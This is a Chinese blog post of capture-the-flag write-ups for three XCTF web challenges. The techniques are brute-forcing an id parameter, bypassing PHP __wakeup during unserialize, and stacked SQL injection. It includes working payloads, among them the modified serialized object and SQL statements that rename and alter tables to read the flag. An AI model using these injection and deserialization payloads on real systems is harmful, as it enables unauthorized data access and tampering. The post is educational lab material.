攻防世界Web “ics-06、unserialize3、supersqli”题解

已于 2022-04-18 22:08:25 修改
阅读量3.2k 收藏 10
点赞数 3
文章标签: web安全 php sql
于 2022-04-18 21:49:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53325209/article/details/124255388
版权

Web安全

周记(4)

—题解

文章目录

前言

三题均来自攻防世界WEB高手进阶区。

一、知识补充

①__wakeup()存在一个缺陷,__wakeup 触发于 unserilize()调用之前,
但是如果被反序列话的字符串其中对应的对象的属性个数发生变化时,会导致反序列化失败而同时使得__wakeup 失效。

②alter修改列名的方法:

alter table patient change mood address VARCHAR(400);

③rename修改表名的方法:

rename table 原表名 to 新表名;

④mysql数据库结构:

数据库~网站~数据库用户
表名
     列名
           数据
           
table_name:表名
column_name:列名
table_schema:数据库名

二、做题

1.ics-06

题目描述:

云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,只有一处留下了入侵者的痕迹。
在这里插入图片描述

解题思路:

进入页面,发现除了点击“报表中心”,其他均无反应。
在这里插入图片描述尝试改变日期范围,无果。
改变思路,看到URL链接中id=1,猜想可能存在爆破的可能,故使用burpsuite对id的参数值进行爆破。
在这里插入图片描述在这里插入图片描述

结果发现当id值为2333时,与其他返回length值不同。
在这里插入图片描述

将原URL链接中id的值改为2333时,即可获得flag。
在这里插入图片描述

2.unserialize3

题目描述:

在这里插入图片描述

解题思路:

首先进行代码审计。

class xctf{                      //定义一个名为xctf的类。
public $flag = '111';            //定义一个公有的类属性$flag,值为111。
public function __wakeup(){      //定义一个公有的类方法__wakeup(),输出bad requests后退出当前脚本。
exit('bad requests');
}
?code=                           //提示我们使用?code传递参数

分析代码,这里有一个魔术方法__wakeup,在反序列化时,php会调用该方法,结合有一个传递参数。
那么这里整体思路就是让我们进行序列化,然后传参,后台的完整代码会进行反序列化我们传递的参数。
编写php代码,创建对象,传递序列化后的对象。

<?php
class xctf{                      
public $flag = '111';            
public function __wakeup(){      
exit('bad requests');
}
}
$test = new xctf();        //使用new运算符来实例化该类(xctf)的对象为test        
echo(serialize($test));    //输出被序列化的对象(test)   
?>

用phpstudy等工具运行php代码。
在这里插入图片描述
分析序列化字符串。

O:4:"xctf":1:{s:4:"flag";s:3:"111";}
O代表结构类型为类:4表示类名长度:类名:类的属性(成员)个数:{属性名类型:长度:名称:值类型:长度:}

我们知道,当成员属性数目大于实际数目时可绕过 _wakeup 方法。
即把1改为2。

O:4:"xctf":2:{s:4:"flag";s:3:"111";}

赋值给code,构造payload,即可获得flag。
在这里插入图片描述

3.supersqli

题目描述:

随便注
在这里插入图片描述

解题思路:

先添加一个单引号,报错。
在这里插入图片描述接着用order by语句判断出有两个字段。
在这里插入图片描述
继续使用union select 爆字段,发现这个时候出现了一段过滤函数。

在这里插入图片描述由上可基本确定,普通注入方法不可行。
接下来采用堆叠注入,先查询所有数据库。

1';show databases;#

在这里插入图片描述再查询所有表。

1';show tables;#

在这里插入图片描述再查询words表中所有列。
发现words是默认查询的表,因为查询出的结果是一个数字加一个字符串,words表结构是id和data,传入的inject参数也就是赋值给了id。

1';show columns from words;#

在这里插入图片描述查询1919810931114514表中所有的列。

1';show columns from `1919810931114514`;#      (字符串为表名操作时要加反引号)

在这里插入图片描述可以采用修改表结构的方法来将words表名改为words1,再将数字名表改为words,这样数字名表就是默认查询的表了。同时将flag字段改为id字段,以达到创建出一个id列的目的。

1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`; alter table `words` change `flag` `id` varchar(100);#

最后在数据框栏内用1' or 1=1 #即可得到flag。
注意:不能进行URL编码构造payload的形式,否则仍会报错。

在这里插入图片描述

总结

`以上就是本周主要题解内容,主要涉及数据爆破、php代码审计(魔术方法_wakeup()、正反序列化)、SQL注入、数据库原理等知识点,和burpsuite、phpstudy等工具的使用。

bright flavor
关注
  • 3
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界ics-06web进阶)
my_name_is_sy的博客
06-17 981
关键技术是暴力破解。 点击来看一下嘛,给孩子凑个数据吧,拜托拜托! 内含详细的集体过程。
攻防世界webics-06:云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,只有一处留下了入侵者的痕迹。
bjml_的博客
10-29 285
ics-06:云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,只有一处留下了入侵者的痕迹。
攻防世界(CTF)~web-supersqli(详细解题思路)
最新发布
m0_75030189的博客
05-10 873
mysql数据库sql语句的默认结束符是以;结尾,在执行多条SQL语句时就要使用结束符隔开,那么在;结束一条sql语句后继续构造下一条语句,会一起执行。这就是堆叠注入的基本原理
ics-06
LYKore的博客
11-12 374
攻防世界(GFSJ0333)ICS-06解题思路及过程
攻防世界-WEB-ics-06
wuh2333的博客
03-09 125
攻防世界-WEB-ics-06;数值爆破
攻防世界ics-06
金 帛的博客
03-15 304
攻防世界WP
XCTF之新手Web题目
weixin_56306210的博客
09-21 419
XCTF之新手Web题目
chrome-unserialize-php-crx插件
04-02
语言:English 将php-serialized数据转换回用于人类可读的... 可以选择var_export或json ... 可以选择var_export或json 无法解决循环参考(如果真的需要,请在Github上提出问题) 谢谢: ... - 固定var_export库未引用对象键
phpunserialize返回false的解决方法
10-25
主要介绍了phpunserialize返回false的解决方法,是PHP程序设计中非常经典的问题,需要的朋友可以参考下
第37天:WEB漏洞-反序列化之PHP&JAVA全解(上)1
08-03
WEB 应用程序中,反序列化是一种常见的漏洞,攻击者可以通过反序列化来控制代码执行、SQL 注入、目录遍历等不可控后果。在 PHP 和 JAVA 中,反序列化漏洞尤其常见,本文将对 PHP 和 JAVA 中的反序列化漏洞进行...
php函数serialize()与unserialize()用法实例
10-25
主要介绍了php函数serialize()与unserialize()用法,以实例形式详细讲述了php函数serialize()与unserialize()的适用情况与使用方法,具有很好的参考借鉴价值,需要的朋友可以参考下
2020全国工业互联网安全技术技能大赛题目
10-28
含有misc,re,crypto,pwn及题目说明
【网络安全 | CTF】攻防世界 ics-06 解题详析
等风来
05-20 3518
题目描述:云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,留下了入侵者的痕迹。仅栏能打开新窗口:注意到URL栏的id参数,对id进行爆破。
web题的暴力破解
MIGENGKING的博客
10-13 2377
攻防世界webics-06 题目描述: 云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,只有一处留下了入侵者的痕迹。 1, 打开链接: 根据题目提示,直接去报表中心: 1.随便输入数据,发现“id=”参数只能输入数字,输入其它的参数也会变成数字 2 然后用burp抓包,然后试着去暴力破解一下,看看是否有啥不同? 有效载荷选择整数类型 3.攻击后查看响应包,发现id为2333时,...
攻防世界ics-06
btdxl的博客
09-30 322
攻防世界ics-06 Burpsuite数值爆破
XCTF-高手进阶区:ics-06
1stPeak's Blog
06-13 3152
第一题:ics-06 目标: id爆破 Writeup 发现报表中心有id可以爆破,直接使用burp爆破 数字的id字典可以用python生成,代码: for m in range (100001): print(m) ...
CTF_Web攻防世界高手区进阶题WP(19-21)
AFCC_的博客(Web_Dog)
09-09 1626
NSCTFweb2题解 打开题目直接是一段代码,提示逆向即为flag,首先看代码: <?php $miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"; function encode($str){ $_o=strrev($str); // echo $_o; for($_0=0;$_0<strlen($_o);$_0++){
攻防世界】五、ics-06
Hi~ 土拨鼠
09-09 243
步骤 打开所给场景 发现只有报表中心可以打开,而且会自动重定向到id=1,修改id的值(试了几次)页面好像也没发生变化,这里有点怪异,我们使用burp对id进行爆破 首先进行抓包: 将抓到的包发送到intruder模块: 添加变量 设置攻击载荷 我这里是写了个python脚本生成了1-10000数字的文件,代码: for i in range(1,10001): f = open('D:/shuzi.txt','a+') f.write(str(i)) f.write('.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值